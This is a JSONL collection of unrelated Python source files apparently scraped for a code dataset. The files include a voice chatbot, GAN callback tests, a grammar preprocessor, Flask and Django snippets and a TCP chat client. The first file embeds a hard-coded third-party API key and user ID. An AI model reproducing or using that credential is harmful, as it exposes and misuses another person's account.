+{"seq_id":"277291756","text":"# 图灵已经限制次数了\r\n# 使用我刚更新的机器人\r\nfrom time import sleep\r\nfrom socket import setdefaulttimeout\r\nfrom re import sub\r\nfrom urllib import request\r\nfrom json import dumps\r\nfrom speech import say\r\nimport AudioTest # 自定义模块\r\n\r\n# 接口地址 http://openapi.tuling123.com/openapi/api/v2\r\nprint(\"[INFO] 模块加载完成\")\r\ndef sendMessage(text):\r\n\tdata0={\r\n\t\t\"reqType\":\"0\",\r\n\t\t\"perception\": {\r\n\t\t\t\"inputText\": {\r\n\t\t\t\t\"text\": \"附近的酒店\"\r\n\t\t\t},\r\n\t\t\t\"selfInfo\": {\r\n\t\t\t\t\"location\": {\r\n\t\t\t\t\t\"city\": \"北京\",\r\n\t\t\t\t\t\"province\": \"北京\",\r\n\t\t\t\t\t\"street\": \"信息路\"\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t},\r\n\t\t\"userInfo\": {\r\n\t\t\t\"apiKey\": \"038aed41be7b451daac8d74340b9e0fd\",\r\n\t\t\t\"userId\": \"316470\"\r\n\t\t}\r\n\t}\r\n\tdata0[\"perception\"][\"inputText\"][\"text\"]=text\r\n\turl_api=\"http://openapi.tuling123.com/openapi/api/v2\"\r\n\ttimeout = 5\r\n\tsetdefaulttimeout(timeout)\r\n\treq = request.Request(url_api,data=dumps(data0).encode(\"utf-8\"))\r\n\treq.add_header('Content-Type','application/json')\r\n\tresponse=request.urlopen(req)\r\n\toutjson=str(response.read(),encoding=\"utf-8\")\r\n\t# print(\"[INFO] 服务器数据\\n\",outjson+\"\\n[/INFO]\")\r\n\tout_str=sub(r\".+value\",\"\",outjson)\r\n\tout_str=sub(r'\"}}]}',\"\",out_str)\r\n\tout_str=out_str[12:] \r\n\treturn out_str\r\n\r\nwhile 1:\r\n\ttry:\r\n\t\tinp=AudioTest.MainMethod(10)['result'][0]\r\n\t\tprint('主人:',inp)\r\n\t\tbackdio=sendMessage(inp)\r\n\t\tprint(\"图灵机器人:\",backdio)\r\n\t\tsay(backdio)\r\n\texcept:\r\n\t\ttry:\r\n\t\t\tbackdio=sendMessage(\" \")\r\n\t\t\tprint(\"图灵机器人:\",backdio)\r\n\t\t\tsay(backdio)\r\n\t\texcept:\r\n\t\t\tprint(\"请求出错!!\")\r\n","sub_path":"Robot/智能聊天.py","file_name":"智能聊天.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"629064462","text":"#encoding: utf-8\n#!/usr/local/bin python3\n\nfrom multiprocessing import Process\nfrom time import sleep\n\ndef run(num):\n print(\"子进程启动\")\n sleep(2)\n print(\"子进程结束\")\n\nif __name__ == \"__main__\":\n print(\"父进程���动\")\n p=Process(target=run,args=(\"1\",))\n p.start()\n #父进程要等待子进程结束后才继续执行,需要使用join()\n #通常用于进程间的同步\n p.join()\n\n print(\"父进程结束\")","sub_path":"more_task2.py","file_name":"more_task2.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"353136011","text":"\"\"\"Array operations\n\"\"\"\n\n# Copyright (c) 2013 Clarinova. This file is licensed under the terms of the\n# Revised BSD License, included in this distribution as LICENSE.txt\n\nfrom numpy import *\nfrom ambry.geo import Point\n\ndef std_norm(a):\n \"\"\"Normalize to +-4 sigma on the range 0 to 1\"\"\"\n\n mean = a.mean()\n std = a.std()\n \n o = (( a - mean) / std).clip(-4,4) # Def of z-score\n o += 4\n o /= 8\n \n try:\n o.set_fill_value(0)\n except AttributeError:\n # If it isn't a masked array\n pass\n \n return o\n\n\ndef unity_norm(a):\n \"\"\"scale to the range 0 to 1\"\"\"\n\n range = a.max() - a.min()\n o = (a - a.min()) / range\n\n try:\n o.set_fill_value(0)\n except AttributeError:\n # If it isn't a masked array\n pass\n \n return o\n\ndef statistics(a):\n \n from numpy import sum as asum\n \n r = (\"Min, Max: {},{}\\n\".format(amin(a), amax(a)) +\n \"Range : {}\\n\".format(ptp(a)) +\n \"Average : {}\\n\".format(average(a))+\n \"Mean : {}\\n\".format(mean(a))+\n \"Median : {}\\n\".format(median(a))+\n \"StdDev : {}\\n\".format(std(a))+\n \"Sum : {}\\n\".format(asum(a))\n )\n \n try:\n # Try the method for masked arrays. The other method will not\n # respect the mask\n r += \"Histogram:{}\".format(histogram(a.compressed())[0].ravel().tolist())\n except:\n r += \"Histogram: {}\".format(histogram(a)[0].ravel().tolist())\n \n return r\n \ndef add(s,v,m):\n return v+(m*s)\n\n \ndef apply_copy(kernel, a, func=add, nodata=None, mult=True):\n \"\"\"For all cells in a, or all nonzero cells, apply the kernel\n to a new output array\n \"\"\"\n from itertools import izip\n \n o = zeros_like(a)\n \n #\n # Generate indices, \n if nodata == 0:\n indx = nonzero(a)\n z = izip(indx[0],indx[1])\n\n elif nodata is not None:\n indx = nonzero(a != nodata)\n z = izip(indx[0],indx[1])\n \n else:\n z = ndindex(a.shape)\n \n for row, col in z:\n kernel.apply(o,Point(col,row), func, a[row,col])\n \n return o\n\n \n \n","sub_path":"ambry/geo/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"52780910","text":"import json\nimport os\n \nmodulesFile = None\ninstalledPack = []\nnotInstalledPack = []\n\ndef readDepen(name, data):\n\tdependencies = data[name]\n\tnotInstalledPack.append(name)\n\tpacksList = []\n\n\tprint(\"installing \"+name) \n\n\tif((not dependencies)==False):\n\t\tdepMessage = \"In order to install \"+str(name)+\\\n\t\t\", we need\"\n\n\t\tfor elem in dependencies:\n\t\t\tif((elem in installedPack)==False):\n\t\t\t\tpacksList.append(elem)\n\n\n\t\tif packsList:\t\n\t\t\tfor elem in packsList:\n\t\t\t\tif(elem != packsList[0]):\n\t\t\t\t\tif(elem == packsList[-1]):\n\t\t\t\t\t\tdepMessage+=\" and\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tdepMessage+=\", \"\n\n\t\t\t\tdepMessage+=(\" \"+elem)\n\t \n\t\t\tprint(depMessage)\n \n\t\tfor elem in packsList:\n\t\t\treadDepen(elem, data)\n\n\ndef installedPackNames():\n\tnames=[]\n\n\tif os.path.isfile('installed_modules'):\n\t\twith open('installed_modules', encoding='utf-8') as f:\n\t\t\tlines = f.readlines()\n\t\t\tif(os.stat(\"installed_modules\").st_size > 0):\n\t\t\t\tlines.pop(0)\n\n\t\t\tfor elem in lines:\n\t\t\t\tnames.append((elem[4:].strip('\\n')))\n\t\t\tf.close()\n\telse:\n\t\tmodulesFile = open('installed_modules','a')\n\t\tmodulesFile.close()\n\n\treturn names\n \n \ndef parseJSON(fname):\n jsonFile = open(fname)\n data = json.loads(jsonFile.read())\n jsonFile.close()\n return data\n\ndef addInstalledPacks():\n\twith open('installed_modules',\"w+\", encoding='utf-8') as f:\n\t\tf.seek(0)\n\t\tf.truncate()\n\t\tall_packages = installedPack+notInstalledPack \n\n\t\tf.write(\"installed_modules/\\n\")\n\t\tfor elem in all_packages:\n\t\t\tline = \"\"\n\t\t\tif(elem == all_packages[-1]):\n\t\t\t\tline+=\"└── \"\n\t\t\telse:\n\t\t\t\tline+=\"├── \"\n\t\t\tline+=elem\n\t\t\tf.write(line+\"\\n\")\n\n\t\tf.close()\n \ndef main():\n\tpackages = parseJSON(\"all_packages.json\")\n\tdep = parseJSON(\"dependencies.json\")\n\n\tinstalledPack = installedPackNames()\n \n\tfor module in dep[\"dependencies\"]:\n\t\tif((module in installedPack)==False):\n\t\t\treadDepen(module, packages)\n\n\tif notInstalledPack:\n\t\taddInstalledPacks()\n\n\tprint(\"All done!\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"3-Dependencies-Resolving/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"83191087","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nanalyze_variants.py\n\nAnalyze the the variants in a vcf, the following will be printed:\n \n - How many variants found\n - How many mendelian violations\n - How many variants where not covered in all individuals. (Default depth 7)\n - How many variants did not satisfy the base call quality treshold. (Default 10)\n - How many variants followed each model:\n - AR_hom\n - AR_comp\n - AR_hom_dn\n - AR_comp_dn\n - AD\n - AD_dn\n - XD\n - XD_dn\n - XR\n - XR_dn\n - How many variants in genetic regions\n - How many rare variants (Default maf < 0.02)\n - How many high scored cadd. (Default cadd > 10)\n - How many rare + high score cadd\n - How many follow a genetic model + rare + high cadd\n\nCreated by Måns Magnusson on 2014-09-08.\nCopyright (c) 2014 __MoonsoInc__. All rights reserved.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport sys\nimport os\nimport click\n\nfrom codecs import open\nfrom datetime import datetime\nfrom pprint import pprint as pp\n\nimport pkg_resources\n\nfrom vcf_parser import parser as vcf_parser\n\nimport genmod\nfrom genmod import warning\n\n### This is for analyzing the variants ###\n\n@click.command()\n@click.argument('variant_file',\n nargs=1,\n type=click.Path(exists=True),\n metavar=' or \"-\"'\n)\n# @click.option('-c', '--config_file',\n# type=click.Path(exists=True),\n# help=\"\"\"Specify the path to a config file.\"\"\"\n# )\n@click.option('--frequency_treshold', '-freq',\n default=0.05,\n nargs=1,\n help='Specify the ferquency treshold for variants to be considered. Default 0.05'\n)\n@click.option('--cadd_treshold', '-cadd',\n default=10.0,\n nargs=1,\n help='Specify the cadd score treshold for variants to be considered. Default 10'\n)\n@click.option('--gq_treshold', '-gq',\n default=10.0,\n nargs=1,\n help='Specify the genotype quality treshold for variants to be considered. Default 10'\n)\n@click.option('--read_depth_treshold', '-depth',\n default=10.0,\n nargs=1,\n help='Specify the genotype quality treshold for variants to be considered. Default 10'\n)\n# @click.option('-p', '--patterns',\n# type=click.Choice(['AR', 'AD', 'X']),\n# multiple=True,\n# help='Specify the inheritance patterns. Default is all patterns'\n# )\n# @click.option('-o', '--outfile',\n# type=click.Path(exists=False),\n# help='Specify the path to a file where results should be stored.'\n# )\n# @click.option('-v', '--verbose',\n# is_flag=True,\n# help='Increase output verbosity.'\n# )\ndef summarize_variants(variant_file, frequency_treshold, cadd_treshold, gq_treshold, read_depth_treshold):\n \"\"\"Analyze the annotated variants in a VCF file.\"\"\" \n \n freq_keyword = '1000GMAF'\n inheritance_keyword = 'GeneticModels'\n \n inheritance_dict = {'AR_hom':0, 'AR_hom_dn': 0, 'AR_comp':0, 'AR_comp_dn': 0 , 'AD':0, 'AD_dn':0, \n 'XD':0, 'XD_dn':0, 'XR':0, 'XR_dn':0}\n number_of_variants = 0\n rare_variants = 0\n high_cadd_scores = 0\n no_cadd_score = 0\n high_cadd_and_rare = 0\n high_gq = 0\n covered_in_all = 0\n indels = 0\n indel_no_cadd = 0\n true_de_novos = 0\n \n analysis_start = datetime.now()\n \n if variant_file == '-':\n variant_parser = vcf_parser.VCFParser(fsock = sys.stdin)\n else:\n variant_parser = vcf_parser.VCFParser(infile = variant_file)\n \n for variant in variant_parser:\n models_found = variant['info_dict'].get(inheritance_keyword, None)\n maf = min([float(frequency) for frequency in variant['info_dict'].get(freq_keyword, '0').split(',')])\n cadd_score = max([float(cscore) for cscore in variant['info_dict'].get('CADD', '0').split(',')])\n reference = variant['REF']\n alternative = variant['ALT']\n\n number_of_variants += 1\n genotypes = variant.get('genotypes', {})\n \n correct_genotype = True\n adequate_depth = True\n \n for individual in genotypes:\n if genotypes[individual].genotype_quality < gq_treshold:\n correct_genotype = False\n \n #If any individual has depth below \"depth\" we do not consider the variant\n if genotypes[individual].quality_depth < read_depth_treshold:\n adequate_depth = False\n \n # Check what variant models that are followed:\n if models_found:\n for model in models_found.split(','):\n if '_dn' in model:\n if correct_genotype:\n true_de_novos += 1\n pp(variant)\n inheritance_dict[model] += 1\n \n # Check the frequency of the variants:\n \n if maf < frequency_treshold:\n rare_variants += 1\n if cadd_score > cadd_treshold:\n high_cadd_and_rare += 1\n \n # Check the cadd score:\n \n if cadd_score > cadd_treshold:\n high_cadd_scores += 1\n \n elif cadd_score == 0:\n no_cadd_score += 1\n \n # Check if indel:\n \n if len(reference) > 1 or len(alternative) > 1:\n indels += 1\n if cadd_score == 0:\n indel_no_cadd += 1\n\n pp(inheritance_dict) \n print('Number of variants: %s' % number_of_variants)\n print('Number of rare: %s. Frequency of all: %.2f' % (rare_variants, rare_variants/number_of_variants))\n print('Number of high cadd scores: %s. Frequency of all: %.2f' % (high_cadd_scores, high_cadd_scores/number_of_variants))\n print('Number of high cadd scores and rare: %s. Frequency of all: %.2f' \n % (high_cadd_and_rare, high_cadd_and_rare/number_of_variants))\n print('Number of no cadd scores: %s. Frequency of all: %.2f \\n' % (no_cadd_score, no_cadd_score/number_of_variants))\n print('Number of indels: %s. Frequency of all: %.2f' % (indels, indels/number_of_variants))\n print('Number of indels and no cadd score: %s. Frequency of all: %.2f \\n' \n % (indel_no_cadd, indel_no_cadd/number_of_variants))\n print('\"True\" de novos: %s \\n' % true_de_novos)\n print('Time for analysis: %s' % str(datetime.now()-analysis_start))\n\nif __name__ == '__main__':\n summarize_variants()","sub_path":"genmod/commands/summarize_variants.py","file_name":"summarize_variants.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"204517696","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 8 19:44:50 2020\r\n\r\n@author: Ela\r\n\"\"\"\r\n\r\nimport argparse\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #initialize argumentparser class for argparse\r\n \r\n parser = argparse.ArgumentParser()\r\n \r\n # add different arguments we need and ther types\r\n # we need fold\r\n \r\n parser.add_argument(\r\n \"--fold\",\r\n type=int\r\n )\r\n # read arguments from command line\r\n \r\n args = parser.parse_args()\r\n \r\n # run the fold specified by command line arguments\r\n \r\n run(fold=args.fold)","sub_path":"parse-train.py","file_name":"parse-train.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"604517994","text":"from PLC.Faults import *\nfrom PLC.Method import Method\nfrom PLC.Parameter import Parameter, Mixed\nfrom PLC.Persons import Person, Persons\nfrom PLC.Auth import Auth\nfrom PLC.Roles import Role, Roles\n\nclass AddRoleToPerson(Method):\n \"\"\"\n Grants the specified role to the person.\n\n PIs can only grant the tech and user roles to users and techs at\n their sites. Admins can grant any role to any user.\n\n Returns 1 if successful, faults otherwise.\n \"\"\"\n\n roles = ['admin', 'pi']\n\n accepts = [\n Auth(),\n Mixed(Role.fields['role_id'],\n Role.fields['name']),\n Mixed(Person.fields['person_id'],\n Person.fields['email']),\n ]\n\n returns = Parameter(int, '1 if successful')\n\n def call(self, auth, role_id_or_name, person_id_or_email):\n # Get role\n roles = Roles(self.api, [role_id_or_name])\n if not roles:\n raise PLCInvalidArgument(\"Invalid role '%s'\" % str(role_id_or_name))\n role = roles[0]\n\n # Get account information\n persons = Persons(self.api, [person_id_or_email])\n if not persons:\n raise PLCInvalidArgument(\"No such account\")\n person = persons[0]\n\n if person['peer_id'] is not None:\n raise PLCInvalidArgument(\"Not a local account\")\n\n # Authenticated function\n assert self.caller is not None\n\n # Check if we can update this account\n if not self.caller.can_update(person):\n raise PLCPermissionDenied(\"Not allowed to update specified account\")\n\n # Can only grant lesser (higher) roles to others\n if 'admin' not in self.caller['roles'] and \\\n role['role_id'] <= min(self.caller['role_ids']):\n raise PLCInvalidArgument(\"Not allowed to grant that role\")\n\n if role['role_id'] not in person['role_ids']:\n person.add_role(role)\n\n self.event_objects = {'Person': [person['person_id']],\n 'Role': [role['role_id']]}\n self.message = \"Role %d granted to person %d\" % \\\n (role['role_id'], person['person_id'])\n\n return 1\n","sub_path":"PLC/Methods/AddRoleToPerson.py","file_name":"AddRoleToPerson.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"380035781","text":"# TestScript.py\n# 8/5/19\n# Purpose: EV3 program code is written and run here!\n# To run: type \"python3 EV3ARScript.py\" on command line\n# NOTE: PROGRAM LOADS FOR ABOUT 30 SECONDS BEFORE RUNNING\n# NOTE: THIS SCRIPT USES MQTT\n\nfrom Commands import * # uses functions from EV3ARCommands.py\nimport globals # uses global variable\n\n\n################## WRITE YOUR CODE BELOW ###############\n\n# Write your code here!\ndef runEV3():\n while True:\n while getColor() != 'red':\n forward(.5,25)\n sleep(4)\n left(90)\n sleep(4)\n while getDist() > 7:\n forward(.5,25)\n sleep(4)\n right(180)\n forward(2,25)\n sleep(4)\n right(90)\n sleep(4)\n forward(3,25)\n sleep(4)\n right(180)\n sleep(4)\n\ndef runInLoop():\n while True:\n print(\"hello\")\n forward(2)\n sleep(1)\n\n\n ################### CODE BELOW RUNS PROGRAM; DON'T TOUCH #####################\n\n### This prepares some behind-the-scenes stuff ###\n\n# wrapper for runEV3 that initializes shared values in multiprocessing\ndef EV3Program(arr,runCode):\n globals.dirArray=arr # sets global array equal to multiprocessing array\n checkEV3(runCode) # check that all motors and sensors are connected\n runInLoop() # runs EV3 code\n runCode.value=False # switches boolean to turn off data upload\n\n\nif __name__=='__main__':\n run(EV3Program)\n\n\n","sub_path":"pythonScripts/Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"504855362","text":"import inspect\nimport os\nimport tempfile\n\nimport ganutil.callbacks as cbks\nimport numpy as np\nimport pytest\nfrom keras.layers import Activation, Dense, Flatten, Reshape\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\n\n@pytest.fixture()\ndef dirpath():\n tempdir = tempfile.TemporaryDirectory()\n print('Directory: %s' % tempdir.name)\n yield tempdir.name\n print('Directory clean upped.')\n tempdir.cleanup()\n\n\n@pytest.mark.callback\n@pytest.mark.parametrize(\"callback\", [\n cbks.GeneratedImage,\n cbks.ValueGraph,\n cbks.LossGraph,\n cbks.AccuracyGraph,\n cbks.ValueHistory,\n cbks.LossHistory,\n cbks.AccuracyHistory,\n cbks.GanProgbarLogger,\n cbks.GanModelCheckpoint\n])\ndef test_inheritance(callback):\n functions = ['on_batch_begin', 'on_batch_end', 'on_epoch_begin',\n 'on_epoch_end', 'on_train_begin', 'on_train_end',\n 'set_model', 'set_params']\n\n assert inspect.isclass(callback)\n\n members = inspect.getmembers(callback)\n for member in members:\n function = member[0]\n for i, f in enumerate(functions):\n if f == function:\n functions.pop(i)\n break\n assert len(functions) == 0\n\n\n@pytest.mark.callback\nclass TestGeneratedImage(object):\n \"\"\"ganutil.callbacks.GeneratedImageをテストするクラス.\"\"\"\n\n def test_property(self, dirpath):\n filepath = os.path.join(dirpath, '{epoch:02d}/images.png')\n\n samples = np.random.uniform(-1, -1, (25, 32))\n\n def normalize(images):\n return images * 127.5 + 127.5\n\n callback = cbks.GeneratedImage(filepath, samples, normalize)\n\n assert callback.filepath == filepath\n assert np.array_equal(callback.samples, samples)\n assert callback.normalize == normalize\n\n def test_callback(self, dirpath):\n filepath = os.path.join(dirpath, '{epoch:02d}/images.png')\n\n generator = Sequential()\n generator.add(Dense(16, input_shape=(32,)))\n generator.add(Activation('tanh'))\n generator.add(Reshape((4, 4, 1)))\n\n discriminator = Sequential()\n discriminator.add(Flatten(input_shape=(4, 4, 1)))\n discriminator.add(Dense(1))\n discriminator.add(Activation('sigmoid'))\n\n gan = Sequential((generator, discriminator))\n gan.compile(Adam(), 'binary_crossentropy')\n\n samples = np.random.uniform(-1, -1, (25, 32))\n\n def normalize(images):\n return images * 127.5 + 127.5\n\n callback = cbks.GeneratedImage(filepath, samples, normalize)\n\n callback.set_model(gan)\n\n for i in range(10):\n callback.on_epoch_end(i, logs={})\n assert os.path.isfile(filepath.format(epoch=i))\n\n\n@pytest.mark.callback\n@pytest.mark.parametrize(\"filepath, sample_mode, epoch_mode\", [\n ('{epoch:02d}/graph.png', 'epoch', True),\n ('{batch:02d}/graph.png', 'batch', False),\n])\ndef test_valuegraph(dirpath, filepath, sample_mode, epoch_mode):\n epoch_logs = {'value': 10}\n batch_logs = {'size': 10, 'value': 1}\n name = 'value'\n\n filepath = os.path.join(dirpath, filepath)\n\n callback = cbks.ValueGraph(filepath, name, sample_mode=sample_mode)\n assert callback.filepath == filepath\n assert callback.name == name\n assert callback.epoch_mode == epoch_mode\n\n callback.on_train_begin()\n assert callback.values == []\n assert callback.epoch_values == []\n\n for i in range(10):\n callback.on_epoch_begin(i, epoch_logs)\n for j in range(10):\n callback.on_batch_begin(j, batch_logs)\n callback.on_batch_end(j, batch_logs)\n assert os.path.isfile(filepath.format(\n epoch=i, batch=j)) != epoch_mode\n callback.on_epoch_end(i, epoch_logs)\n assert os.path.isfile(filepath.format(epoch=i, batch=-1)) == epoch_mode\n callback.on_train_end()\n assert callback.values == [1 for _ in range(10 * 10)]\n assert callback.epoch_values == [10 for _ in range(10)]\n\n\n@pytest.mark.callback\n@pytest.mark.parametrize(\"filepath, sample_mode, epoch_mode\", [\n ('{epoch:02d}/array.npy', 'epoch', True),\n ('{batch:02d}/array.npy', 'batch', False),\n])\ndef test_valuehistory(dirpath, filepath, sample_mode, epoch_mode):\n epoch_logs = {'value': 10}\n batch_logs = {'size': 10, 'value': 1}\n name = 'value'\n\n filepath = os.path.join(dirpath, filepath)\n\n callback = cbks.ValueHistory(filepath, name, sample_mode=sample_mode)\n assert callback.filepath == filepath\n assert callback.name == name\n assert callback.epoch_mode == epoch_mode\n\n callback.on_train_begin()\n assert callback.values == []\n assert callback.epoch_values == []\n\n for i in range(10):\n callback.on_epoch_begin(i, epoch_logs)\n for j in range(10):\n callback.on_batch_begin(j, batch_logs)\n callback.on_batch_end(j, batch_logs)\n assert os.path.isfile(filepath.format(\n epoch=i, batch=j)) != epoch_mode\n callback.on_epoch_end(i, epoch_logs)\n assert os.path.isfile(filepath.format(epoch=i, batch=-1)) == epoch_mode\n callback.on_train_end()\n assert callback.values == [1 for _ in range(10 * 10)]\n assert callback.epoch_values == [10 for _ in range(10)]\n\n@pytest.mark.callback\n@pytest.mark.parametrize('epochs, steps', [\n (1, 10),\n (2, 10),\n (30, 50),\n])\ndef test_progbar(epochs, steps):\n progbar = cbks.GanProgbarLogger()\n progbar.params = {\n 'epochs': epochs,\n 'steps': steps,\n 'metrics': {\n 'discriminator': ['loss'],\n 'generator': ['loss']\n }\n }\n progbar.on_train_begin()\n for epoch in range(epochs):\n progbar.on_epoch_begin(epoch)\n for step in range(steps):\n logs = {\n 'discriminator': {\n 'loss': step,\n },\n 'generator': {\n 'loss': step,\n }\n }\n progbar.on_batch_begin(step, logs)\n progbar.on_batch_end(step, logs)\n logs = {\n 'discriminator': {\n 'loss': epoch,\n },\n 'generator': {\n 'loss': epoch,\n }\n }\n progbar.on_epoch_end(epoch, logs)\n\n progbar.on_train_end()\n","sub_path":"test/test_callbacks.py","file_name":"test_callbacks.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"349418209","text":"import numpy as np\nfrom nltk import Tree\nfrom nltk.grammar import Production, Nonterminal, ProbabilisticProduction\n\n\n\n\ndef load_datas(file_path):\n cfg = open(file_path)\n sentences = []\n # Store each line of the data:\n for line in cfg.readlines():\n line = line.replace('\\n', '').split(' ')\n L = []\n for seq in line:\n if seq[0] == '(' and '-' in seq:\n L.append(seq.split('-')[0])\n else:\n L.append(seq)\n sentences.append(''.join(str(s) + ' ' for s in L)[:-1])\n return sentences\n\n\n\ndef generate_set(sentences, p=0.8):\n # Reshuffle the sentences\n np.random.shuffle(sentences)\n l = len(sentences)\n # Define the differents sets\n x_train = sentences[:int(p * l)]\n x_val = sentences[int(p * l): -int((1-p)/2 * l)]\n x_test = sentences[-int((1-p)/2 * l):]\n return x_train, x_val, x_test\n\n\n\n\ndef get_grammar(sentences):\n gram, prods = {}, []\n for sent in sentences:\n processing = process_sent(sent)\n processing.create_Tree(sent)\n for prod in processing.Tree_prod:\n processing.prod = prod\n processing.modify_tree()\n prods.append(processing.prod)\n r, l = processing.rhs, processing.lhs\n if str(r) not in gram:\n gram[str(r)] = []\n if str(l) not in gram[str(r)]:\n gram[str(r)].append(str(l))\n return gram, prods\n\n\n\n\nclass process_sent():\n \n def __init__(self, sent, save_prods=[], save_unary=[], Words_set=[]):\n self.save_prods = save_prods\n self.save_unary = save_unary\n # Words_set contient tous les tokens rencontrés\n self.Words_set = Words_set\n \n \n def create_Tree(self, sent):\n tree = Tree.fromstring(sent)\n tree.chomsky_normal_form()\n self.Tree_prod = tree.productions()\n \n \n def modify_tree(self):\n ''' Delete the end of the part of speech '''\n lhs = self.prod.lhs()\n self.lhs = Nonterminal(lhs.symbol().split(\"|\")[0])\n self.rhs = self.prod.rhs()\n if len(self.rhs) > 1:\n self.rhs = [Nonterminal(r.symbol().split(\"|\")[0]) for r in self.rhs]\n self.prod = Production(self.lhs, self.rhs)\n \n \n def transform_terminals(self):\n ''' This function replaces the terminal tokens by the POS tag and store the tokens '''\n if isinstance(self.rhs[0], str):\n self.prod = Production(self.lhs, [str(self.lhs)])\n # we store the tokens\n self.Words_set.append(self.rhs[0])\n\n \n def save_unitary_rule(self):\n ''' We save elements we want to modify '''\n if len(self.rhs)==1 and isinstance(self.rhs[0], str)==False:\n self.save_unary.append(self.prod)\n \n \n def modify_unitary_rules(self):\n self.dict, possible_rules, unary = {}, list(set(self.save_prods)), list(set(self.save_unary))\n for rule in unary:\n spe_rules = [r for r in possible_rules if (len(r.rhs()) > 1 and r.lhs() == rule.rhs()[0])]\n self.dict[rule] = [Production(rule.lhs(), r.rhs()) for r in spe_rules]\n \n \n def delete_prods(self):\n ''' Replaces unitary rules where rhs is a non terminal symbol '''\n self.modify_unitary_rules()\n prods_modify, unary = [], list(set(self.save_unary))\n for prod in self.save_prods:\n if prod in unary:\n prods_modify += self.dict[prod]\n else:\n prods_modify.append(prod)\n return prods_modify\n \n \n def process(self, sent):\n ''' We pre-process a sentence with the previous functions '''\n self.create_Tree(sent)\n for prod in self.Tree_prod:\n self.prod = prod\n self.modify_tree()\n self.transform_terminals()\n self.save_prods.append(self.prod)\n self.save_unitary_rule()\n return self.save_prods, self.save_unary, self.Words_set","sub_path":"TD2/load_transform_data.py","file_name":"load_transform_data.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"469661892","text":"from django import forms\nfrom clinicmodels.models import Patient\n\n\nclass PatientForm(forms.ModelForm):\n class Meta:\n model = Patient\n fields = ['village_prefix', 'name', 'local_name',\n 'contact_no', 'gender', 'travelling_time_to_village',\n 'date_of_birth', 'drug_allergy', 'parent', 'face_encodings', 'picture']\n\n","sub_path":"patient/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"228356793","text":"from flask import jsonify, make_response, g\nfrom marshmallow import ValidationError\n\nfrom app import app\nfrom app.decorators import auth_login_required, login_required\nfrom .services import ProfileService\nfrom .schemas import ProfileSchema, CreateProfileSchema\n\nNAMESPACE = '/profile'\n\n\n@app.route(NAMESPACE + '/create', methods=['GET'])\n@auth_login_required\ndef route_create_profile():\n data = g.create_profile_data\n\n service = ProfileService\n try:\n loaded_data = CreateProfileSchema(unknown=True).load(data)\n except ValidationError as error:\n return make_response(jsonify(errors=error.messages), 500)\n else:\n new_profile = service.create(loaded_data)\n return make_response(\n jsonify(data=ProfileSchema().dump(new_profile)),\n 200\n )\n\n\n@app.route(NAMESPACE + '/get', methods=['GET'])\n@login_required\ndef route_get_profile():\n return make_response(\n jsonify(data=ProfileSchema().dump(g.profile)),\n 200\n )\n","sub_path":"app/profile/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187590416","text":"# TCPMessageClient.py\n\nimport socket\nimport select\nimport string\nimport time\nimport sys\n\ndef prompt():\n sys.stdout.write('Message -> ')\n sys.stdout.flush()\n\n#main function\nif __name__ == \"__main__\":\n\n if(len(sys.argv) < 3) :\n print('Usage : python3 TCPMessageClient.py hostname port')\n sys.exit()\n\n host = sys.argv[1]\n port = int(sys.argv[2])\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n\n # connect to remote host\n try :\n s.connect((host, port))\n except :\n print('Connection failed. Please check your values and run the script again.')\n sys.exit()\n\n print('Connection to server established successfully.')\n prompt()\n\n while 1:\n socket_list = [sys.stdin, s]\n\n # Get the list sockets which are readable\n read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])\n\n for sock in read_sockets:\n #incoming message from remote server\n if sock == s:\n data = sock.recv(1024)\n data = data.decode('UTF-8')\n if not data :\n print('\\nDisconnected from the server.')\n sys.exit()\n else :\n #print data\n sys.stdout.write(data)\n prompt()\n\n #user entered a message\n else :\n msg = sys.stdin.readline()\n msg = msg.encode()\n s.send(msg)\n prompt()\n","sub_path":"GCSE/TCPMessageClient.py","file_name":"TCPMessageClient.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
